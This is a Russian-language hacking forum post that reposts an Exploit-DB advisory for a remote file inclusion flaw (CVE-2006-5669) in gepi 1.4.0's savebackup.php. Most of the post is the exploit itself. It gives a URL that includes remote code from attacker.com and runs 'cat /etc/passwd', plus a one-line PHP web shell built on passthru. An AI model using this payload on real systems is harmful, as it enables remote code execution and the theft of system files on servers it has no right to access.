savebackup.php' Remote File Inclusion

Автор темы Exploiter
Дата начала 21 Дек 2022
Просмотров 252 Просмотров

JavaScript отключён. Чтобы полноценно использовать наш сайт, включите JavaScript в своём браузере.

Exploiter

Хакер

21 Дек 2022

EDB-ID: 2692

Проверка EDB

Пройдено

Автор: SUMIT SIDDHARTH

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2006-5669

Дата публикации: 2006-10-31

Код:

Package:- gepi 1.4.0
http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz

impact:- highly critical ..System Access..
vulnerable code:-
      include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat
/etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id

# milw0rm.com [2006-10-31]

Источник: www.exploit-db.com

Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploit FOOT Gestion - 'id' SQL Injection

Ответы: 0

Просмотры: 385

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Prototype of an PHP Application 0.1 - '/gestion/index.php?path_inc' Remote File Inclusion

Ответы: 0

Просмотры: 289

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Сверху Снизу

Привет, Друг. Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.